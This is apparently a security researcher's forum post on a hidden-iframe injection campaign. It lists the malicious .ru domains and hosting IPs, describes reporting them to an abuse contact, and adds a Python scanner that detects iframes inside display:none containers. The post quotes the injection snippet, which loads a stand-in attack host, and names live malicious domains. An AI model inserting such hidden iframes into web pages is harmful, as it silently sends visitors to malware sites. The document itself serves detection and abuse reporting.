I’m researching some new attacks that have been popping up on the BadwareBusters forum recently.
Attacks have the form:
```html
<div style="display:none">mhukhzwbanqawsrlyqptqnfmpiiigkr<iframe width=548 height=403 src="http://ATTACK.SITE:8080/index.php"></iframe></div>
```
After reviewing the posts by our users, I compiled the following list of attack sites:
* bio-vozrast.ru
* your-bio.ru
* biovoz.ru
* age-info.ru
* bio-z.ru
* theprevious.ru
* age-ega.ru
All domains point to a pool of 5 NL-based IP addresses:
| AS | IP | CIDR | AS Name |
|---|---|---|---|
| 16265 | 85.17.138.27 | 85.17.0.0/16 | LEASEWEB |
| 16265 | 85.17.237.5 | 85.17.0.0/16 | LEASEWEB |
| 15703 | 87.233.139.100 | 87.233.128.0/18 | TRUESERVER |
| 15435 | 217.23.4.76 | 217.23.0.0/20 | KABELFOON |
| 15435 | 217.23.5.27 | 217.23.0.0/20 | KABELFOON |
A cursory port scan shows a wide range of services open for each IP address. 85.17.138.27 has two ports which claim to be Webmin interfaces for karaokeplus.info. It is unclear if karaokeplus.info is related to these attack sites.
Of the three AS blocks listed (each corresponding to some sort of internet service), only one has an easy-to-find abuse address:
abuse@leaseweb.com
I’ve sent an email to Leaseweb and will continue to hunt for contacts at the other two organizations.
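As an added example (not part of the original post), here is a small Python scanner for the injection pattern shown at the top of the post: it walks a page's HTML, reports every `<iframe>` nested inside a `display:none` container, and marks whether the iframe's host is on a watchlist seeded from the domains listed above. The sample page is constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Domains named in the post above, used as a watchlist
WATCHLIST = {"bio-vozrast.ru", "your-bio.ru", "biovoz.ru", "age-info.ru",
             "bio-z.ru", "theprevious.ru", "age-ega.ru"}

# Constructed sample page: one visible, legitimate iframe and one hidden injection
SAMPLE_HTML = """<html><body>
<iframe src="https://video.example/embed/1" width=640 height=360></iframe>
<div style="display:none">mhukhzwbanqawsrlyqptqnfmpiiigkr<iframe width=548 height=403 src="http://bio-z.ru:8080/index.php"></iframe></div>
</body></html>"""


class HiddenIframeFinder(HTMLParser):
    """Collects <iframe> tags that sit inside an element styled display:none."""

    def __init__(self):
        super().__init__()
        self._stack = []        # (tag, is_hidden) for each open element
        self._hidden_depth = 0  # > 0 while inside at least one hidden container
        self.findings = []

    @staticmethod
    def _is_hidden(attrs):
        style = (dict(attrs).get("style") or "").replace(" ", "").lower()
        return "display:none" in style

    def handle_starttag(self, tag, attrs):
        hidden = self._is_hidden(attrs)
        self._stack.append((tag, hidden))
        if hidden:
            self._hidden_depth += 1
        if tag == "iframe" and self._hidden_depth > 0:
            src = dict(attrs).get("src") or ""
            parts = urlsplit(src)
            self.findings.append({"src": src, "host": parts.hostname, "port": parts.port})

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; tolerates unclosed void elements
        while self._stack:
            open_tag, hidden = self._stack.pop()
            if hidden:
                self._hidden_depth -= 1
            if open_tag == tag:
                break


def scan_page(html, watchlist=frozenset()):
    """Return hidden iframes found in html, each flagged if its host is on the watchlist."""
    parser = HiddenIframeFinder()
    parser.feed(html)
    parser.close()
    for finding in parser.findings:
        finding["on_watchlist"] = finding["host"] in watchlist
    return parser.findings
```

Any hidden iframe whose host is not on the watchlist is still reported, so the scanner also surfaces new domains a campaign rotates to.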